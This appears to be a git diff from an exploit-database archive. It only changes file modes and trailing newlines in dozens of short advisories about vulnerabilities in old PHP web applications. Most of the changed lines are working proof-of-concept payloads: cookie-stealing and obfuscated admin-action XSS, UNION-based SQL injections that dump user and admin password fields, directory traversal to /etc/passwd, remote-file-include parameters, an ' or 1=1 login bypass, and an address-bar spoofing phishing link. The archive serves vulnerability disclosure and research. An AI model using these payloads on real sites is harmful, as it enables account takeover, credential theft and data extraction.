a/platforms/php/webapps/32443.txt b/platforms/php/webapps/32443.txt old mode 100755 new mode 100644 index 7e2ce1379..81f9a1539 --- a/platforms/php/webapps/32443.txt +++ b/platforms/php/webapps/32443.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects versions of the CAcert source code released on or before September 21, 2008. -openssl req -new -x509 -subj "/CN=<\/pre><script>alert(document.cookies)<\/script><pre>" \ No newline at end of file +openssl req -new -x509 -subj "/CN=<\/pre><script>alert(document.cookies)<\/script><pre>" \ No newline at end of file diff --git a/platforms/php/webapps/32444.txt b/platforms/php/webapps/32444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32447.txt b/platforms/php/webapps/32447.txt old mode 100755 new mode 100644 index 621c463f4..17d407916 --- a/platforms/php/webapps/32447.txt +++ b/platforms/php/webapps/32447.txt @@ -4,4 +4,4 @@ A4Desk Event Calendar is prone to a remote file-include vulnerability because it Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/index.php?date=&v=http://www.example2.com \ No newline at end of file +http://www.example.com/[path]/index.php?date=&v=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32449.txt b/platforms/php/webapps/32449.txt old mode 100755 new mode 100644 index 8c6808a41..5e85bf129 --- a/platforms/php/webapps/32449.txt +++ b/platforms/php/webapps/32449.txt @@ -10,4 +10,4 @@ http://www.example.com/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27 http://www.example.com/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E] -http://www.example.com/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};} \ No newline at end of file +http://www.example.com/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};} \ No newline at end of file diff --git a/platforms/php/webapps/3245.txt b/platforms/php/webapps/3245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32450.txt b/platforms/php/webapps/32450.txt old mode 100755 new mode 100644 index c57425248..62dd6da96 --- a/platforms/php/webapps/32450.txt +++ b/platforms/php/webapps/32450.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php/Special/Main/keywordSearch?key="><iframe src="h http://www.example.com/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http://www.example2.com"></iframe> http://www.example.com/index.php/Special/Main/WhatLinksHere?to="><iframe src="http://www.example2.com"></iframe> http://www.example.com/index.php/Special/Main/UserEdits?user="><iframe src="http://www.example2.com"></iframe> -http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe> \ No newline at end of file +http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/32453.txt b/platforms/php/webapps/32453.txt old mode 100755 new mode 100644 index 4eb689198..a8d4d5a35 --- a/platforms/php/webapps/32453.txt +++ b/platforms/php/webapps/32453.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow HostAdmin 3.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?page=[XSS] \ No newline at end of file +http://www.example.com/[path]/index.php?page=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3246.txt b/platforms/php/webapps/3246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32461.txt b/platforms/php/webapps/32461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32462.txt b/platforms/php/webapps/32462.txt old mode 100755 new mode 100644 index c2f275c79..a05490955 --- a/platforms/php/webapps/32462.txt +++ b/platforms/php/webapps/32462.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to bypass filter restrictions and post spam con SMF 1.1.6 is vulnerable; other versions may also be affected. -[b]ht[b][/b]tp://www.ex[i][/i]ample.com/[/b] \ No newline at end of file +[b]ht[b][/b]tp://www.ex[i][/i]ample.com/[/b] \ No newline at end of file diff --git a/platforms/php/webapps/32463.txt b/platforms/php/webapps/32463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32464.txt b/platforms/php/webapps/32464.txt old mode 100755 new mode 100644 index d95303f4b..03e25013f --- a/platforms/php/webapps/32464.txt +++ b/platforms/php/webapps/32464.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities using directory-traversal strings PHP Web Explorer 0.99b is vulnerable; other versions may also be affected. -http://www.example.com/edit.php?file=../../../etc/passwd \ No newline at end of file +http://www.example.com/edit.php?file=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32467.txt b/platforms/php/webapps/32467.txt old mode 100755 new mode 100644 index 5d5d8af35..a3c8640ff --- a/platforms/php/webapps/32467.txt +++ b/platforms/php/webapps/32467.txt @@ -8,4 +8,4 @@ NOTE: The security-bypass issue has been reassigned to BID 31643 (Opera Cached J Versions prior to Opera 9.60 are vulnerable. -http://BBB...BBB:password@example.com \ No newline at end of file +http://BBB...BBB:password@example.com \ No newline at end of file diff --git a/platforms/php/webapps/32468.txt b/platforms/php/webapps/32468.txt old mode 100755 new mode 100644 index 16de55740..80e4f8a27 --- a/platforms/php/webapps/32468.txt +++ b/platforms/php/webapps/32468.txt @@ -10,4 +10,4 @@ http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_ http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]= -http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= \ No newline at end of file +http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= \ No newline at end of file diff --git a/platforms/php/webapps/3247.txt b/platforms/php/webapps/3247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32473.txt b/platforms/php/webapps/32473.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32474.txt b/platforms/php/webapps/32474.txt old mode 100755 new mode 100644 index 49056ee58..a71a617d8 --- a/platforms/php/webapps/32474.txt +++ b/platforms/php/webapps/32474.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow EEB-CMS 0.95 is affected; other versions may be vulnerable as well. -http://www.example.com/index.php?content="><script>alert("test")</script> \ No newline at end of file +http://www.example.com/index.php?content="><script>alert("test")</script> \ No newline at end of file diff --git a/platforms/php/webapps/32479.txt b/platforms/php/webapps/32479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32486.txt b/platforms/php/webapps/32486.txt old mode 100755 new mode 100644 index 5cf53ad8d..8dc60dde2 --- a/platforms/php/webapps/32486.txt +++ b/platforms/php/webapps/32486.txt @@ -4,4 +4,4 @@ Webscene eCommerce is prone to an SQL-injection vulnerability because it fails t A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- \ No newline at end of file +http://www.example.com/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- \ No newline at end of file diff --git a/platforms/php/webapps/32487.txt b/platforms/php/webapps/32487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32488.txt b/platforms/php/webapps/32488.txt old mode 100755 new mode 100644 index 25f32212c..0a9a23fa6 --- a/platforms/php/webapps/32488.txt +++ b/platforms/php/webapps/32488.txt @@ -8,4 +8,4 @@ Using the session-fixation issue, the attacker can hijack the session and gain u Elxis CMS 2006.1 is vulnerable; other versions may also be affected. -http://www.site.com/?PHPSESSID=[session_fixation] \ No newline at end of file +http://www.site.com/?PHPSESSID=[session_fixation] \ No newline at end of file diff --git a/platforms/php/webapps/3249.txt b/platforms/php/webapps/3249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32490.txt b/platforms/php/webapps/32490.txt old mode 100755 new mode 100644 index 573ec58be..d1df0b0d5 --- a/platforms/php/webapps/32490.txt +++ b/platforms/php/webapps/32490.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access SweetCMS 1.5.2 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- \ No newline at end of file +http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- \ No newline at end of file diff --git a/platforms/php/webapps/32492.txt b/platforms/php/webapps/32492.txt old mode 100755 new mode 100644 index aed1b0508..19934d940 --- a/platforms/php/webapps/32492.txt +++ b/platforms/php/webapps/32492.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Habari 0.5.1 is affected; other versions may be vulnerable as well. -http://www.example.com/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> \ No newline at end of file +http://www.example.com/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> \ No newline at end of file diff --git a/platforms/php/webapps/32494.txt b/platforms/php/webapps/32494.txt old mode 100755 new mode 100644 index 4322ac55d..c1ac00486 --- a/platforms/php/webapps/32494.txt +++ b/platforms/php/webapps/32494.txt @@ -4,4 +4,4 @@ FlashChat is prone to a security-bypass vulnerability. An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. -sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= \ No newline at end of file +sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= \ No newline at end of file diff --git a/platforms/php/webapps/32495.txt b/platforms/php/webapps/32495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32496.txt b/platforms/php/webapps/32496.txt old mode 100755 new mode 100644 index 0e6d05845..f3ef0aba2 --- a/platforms/php/webapps/32496.txt +++ b/platforms/php/webapps/32496.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Jetbox CMS 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] \ No newline at end of file +http://www.example.com/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] \ No newline at end of file diff --git a/platforms/php/webapps/32497.txt b/platforms/php/webapps/32497.txt old mode 100755 new mode 100644 index 5d36a743a..f38eb017e --- a/platforms/php/webapps/32497.txt +++ b/platforms/php/webapps/32497.txt @@ -4,4 +4,4 @@ Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- \ No newline at end of file +http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- \ No newline at end of file diff --git a/platforms/php/webapps/32499.txt b/platforms/php/webapps/32499.txt old mode 100755 new mode 100644 index ed3926bd6..fd304f608 --- a/platforms/php/webapps/32499.txt +++ b/platforms/php/webapps/32499.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc phPhotoGallery 0.92 is affected; other versions may also be vulnerable. -Username : ' or 1=1/*Password : ' or 1=1/* \ No newline at end of file +Username : ' or 1=1/*Password : ' or 1=1/* \ No newline at end of file diff --git a/platforms/php/webapps/3250.txt b/platforms/php/webapps/3250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32502.txt b/platforms/php/webapps/32502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32503.txt b/platforms/php/webapps/32503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32504.txt b/platforms/php/webapps/32504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32505.txt b/platforms/php/webapps/32505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32506.txt b/platforms/php/webapps/32506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32507.txt b/platforms/php/webapps/32507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32508.txt b/platforms/php/webapps/32508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32509.txt b/platforms/php/webapps/32509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3251.txt b/platforms/php/webapps/3251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32510.txt b/platforms/php/webapps/32510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32511.txt b/platforms/php/webapps/32511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32516.txt b/platforms/php/webapps/32516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3252.txt b/platforms/php/webapps/3252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32520.txt b/platforms/php/webapps/32520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32521.txt b/platforms/php/webapps/32521.txt old mode 100755 new mode 100644 index f3681451a..a4f13242e --- a/platforms/php/webapps/32521.txt +++ b/platforms/php/webapps/32521.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application an Osprey 1.0a4.1 is vulnerable; other versions may also be affected. http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell] -http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell] \ No newline at end of file +http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/32523.txt b/platforms/php/webapps/32523.txt old mode 100755 new mode 100644 index bd2dc67f1..6f5b04fb5 --- a/platforms/php/webapps/32523.txt +++ b/platforms/php/webapps/32523.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing-style attacks. SiteEngine 5.0 is vulnerable; other versions may also be affected. -http://www.example.com/api.php?action=logout&forward=http://www.example2.com \ No newline at end of file +http://www.example.com/api.php?action=logout&forward=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32524.txt b/platforms/php/webapps/32524.txt old mode 100755 new mode 100644 index c4730e37c..012c45c15 --- a/platforms/php/webapps/32524.txt +++ b/platforms/php/webapps/32524.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc SiteEngine 5.0 is vulnerable; other versions may also be affected. -http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* \ No newline at end of file +http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* \ No newline at end of file diff --git a/platforms/php/webapps/32525.txt b/platforms/php/webapps/32525.txt old mode 100755 new mode 100644 index c8dfca3eb..23dc34061 --- a/platforms/php/webapps/32525.txt +++ b/platforms/php/webapps/32525.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Jetbox CMS 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32526.txt b/platforms/php/webapps/32526.txt old mode 100755 new mode 100644 index 4603fb5eb..9273f6f0c --- a/platforms/php/webapps/32526.txt +++ b/platforms/php/webapps/32526.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file +http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32527.txt b/platforms/php/webapps/32527.txt old mode 100755 new mode 100644 index aba4e9975..b2304d874 --- a/platforms/php/webapps/32527.txt +++ b/platforms/php/webapps/32527.txt @@ -8,4 +8,4 @@ HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that i NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue. -http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2); \ No newline at end of file +http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2); \ No newline at end of file diff --git a/platforms/php/webapps/32528.txt b/platforms/php/webapps/32528.txt old mode 100755 new mode 100644 index 29e483a8b..a3a1f13fd --- a/platforms/php/webapps/32528.txt +++ b/platforms/php/webapps/32528.txt @@ -4,4 +4,4 @@ iPei Guestbook is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?pg=c0d3_xss \ No newline at end of file +http://www.example.com/index.php?pg=c0d3_xss \ No newline at end of file diff --git a/platforms/php/webapps/3253.txt b/platforms/php/webapps/3253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32531.txt b/platforms/php/webapps/32531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32532.txt b/platforms/php/webapps/32532.txt old mode 100755 new mode 100644 index cbf6db1e9..0aad3971a --- a/platforms/php/webapps/32532.txt +++ b/platforms/php/webapps/32532.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin This issue affects 'bcoos' 1.0.13; other versions may also be affected. -http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell \ No newline at end of file +http://www.example.com/include/common.php?XOOPS_ROOT_PATH=shell \ No newline at end of file diff --git a/platforms/php/webapps/32533.txt b/platforms/php/webapps/32533.txt old mode 100755 new mode 100644 index 205d6ab48..f9bcd9385 --- a/platforms/php/webapps/32533.txt +++ b/platforms/php/webapps/32533.txt @@ -8,4 +8,4 @@ Tandis CMS 2.5.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users -http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()-- \ No newline at end of file +http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()-- \ No newline at end of file diff --git a/platforms/php/webapps/32535.txt b/platforms/php/webapps/32535.txt old mode 100755 new mode 100644 index 88c6ad53a..6652f0975 --- a/platforms/php/webapps/32535.txt +++ b/platforms/php/webapps/32535.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MyBB 1.4.2 is vulnerable; other versions may also be affected. -http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))// \ No newline at end of file +http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%20%2B%27http://www.example2.com/cookiejar.php?c=%27%2Bdocument.cookie// http://www.example.com/mybb/moderation.php?action=removesubscriptions&ajax=1&url=%27%2Beval(%22u%3D%27application%2Fx-www-%27%2B%20%27form-urlencoded%27%22%2B%20String.fromCharCode(59)%20%2B%22c%3D%27Content-type%27%22%2B%20String.fromCharCode(59)%20%2B%22d%3D%27Content-length%27%22%2B%20String.fromCharCode(59)%20%2B%22reg%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22reg.open(%27GET%27%2C%20%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%2C%20false)%22%2B%20String.fromCharCode(59)%20%2B%22reg.send(null)%22%2B%20String.fromCharCode(59)%20%2B%22r%3Dreg.responseText%22%2B%20String.fromCharCode(59)%20%2B%22t%3D%27http%3A%2F%2Fwww.example%2Fmybb%2Fadmin%2Findex.php%3Fmodule%3Dconfig%2Fmycode%26action%3Dadd%27%22%2B%20String.fromCharCode(59)%20%2B%22t2%3D%27%26replacement%3D%241%26active%3D1%26my_post%22%20%20%20%20%2B%22_key%3D%27%2Br.substr(r.indexOf(%27my_post_%22%20%2B%22key%27%2B%20%27%27) %2B15%2C32)%22%2F*%20%20%20%20%20%20*%2F%2B%22%20%2B%27%26title%3DPwned%26description%27%2B%20%27%3Dfoo%26regex%3D%22%20%20%20%20%20%20%20%2B%22evil(.*)evil%2523e%2500test%27%22%2B%20String.fromCharCode(59)%20%2B%22r2%3Dnew%20XMLHttpRequest()%22%2B%20String.fromCharCode(59)%20%2B%22r2.open(%27POST%27%2Ct%2Cfalse)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(d%2Ct2.length)%22%2B%20String.fromCharCode(59)%20%2B%22r2.setRequestHeader(c%2Cu)%22%2B%20String.fromCharCode(59)%20%2B%22r2.sendAsBinary(t2)%22%2B%20String.fromCharCode(59))// \ No newline at end of file diff --git a/platforms/php/webapps/32536.txt b/platforms/php/webapps/32536.txt old mode 100755 new mode 100644 index db134b43a..df8a9e496 --- a/platforms/php/webapps/32536.txt +++ b/platforms/php/webapps/32536.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects bcoos 1.0.13; other versions may also be affected. -http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/* \ No newline at end of file +http://www.example.com/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/* \ No newline at end of file diff --git a/platforms/php/webapps/32537.txt b/platforms/php/webapps/32537.txt old mode 100755 new mode 100644 index 50cd97ff3..a7805b8fa --- a/platforms/php/webapps/32537.txt +++ b/platforms/php/webapps/32537.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AIOCP 1.4 is vulnerable; other versions may also be affected. -http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- \ No newline at end of file +http://www.example.com/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- \ No newline at end of file diff --git a/platforms/php/webapps/32538.txt b/platforms/php/webapps/32538.txt old mode 100755 new mode 100644 index 1244f2a17..9df8349eb --- a/platforms/php/webapps/32538.txt +++ b/platforms/php/webapps/32538.txt @@ -4,4 +4,4 @@ PHP-Nuke Nuke League module is prone to a cross-site scripting vulnerability bec An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS] \ No newline at end of file +http://www.example.com/modules.php?name=League&file=index&op=team&tid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32539.html b/platforms/php/webapps/32539.html old mode 100755 new mode 100644 index e3d417908..c3f927b02 --- a/platforms/php/webapps/32539.html +++ b/platforms/php/webapps/32539.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to spoof the source URI of a site presented Internet Explorer 6 is affected by this issue. -<a href="http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n <http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n/> bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;.phish.site/">Example</a> (In words, this is <a href="http://www.example.com <http://www.example.com/> followed by 30 ampersand-NBSP-semicolon, followed by a dot followed by another 31 ampersand-NBSP-semicolon followed by a dot, followed by 13 ampersand-NBSP-semicolon followed by a dot followed by phish.site/">Example</a>) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" <http://www.example.com%22/> ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/") \ No newline at end of file +<a href="http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n <http://www.example.com&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n/> bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;.phish.site/">Example</a> (In words, this is <a href="http://www.example.com <http://www.example.com/> followed by 30 ampersand-NBSP-semicolon, followed by a dot followed by another 31 ampersand-NBSP-semicolon followed by a dot, followed by 13 ampersand-NBSP-semicolon followed by a dot followed by phish.site/">Example</a>) This causes a link whose URL appears, IN THE ADDRESS BAR, as (may wrap around): http://www.example.com . . .phish.site/ (In words, this appears like "http://www.example.com" <http://www.example.com%22/> ; followed by 30 spaces, a dot, 31 spaces, a dot, 13 spaces, a dot and finally "phish.site/") \ No newline at end of file diff --git a/platforms/php/webapps/32541.txt b/platforms/php/webapps/32541.txt old mode 100755 new mode 100644 index c364a3804..987b398e2 --- a/platforms/php/webapps/32541.txt +++ 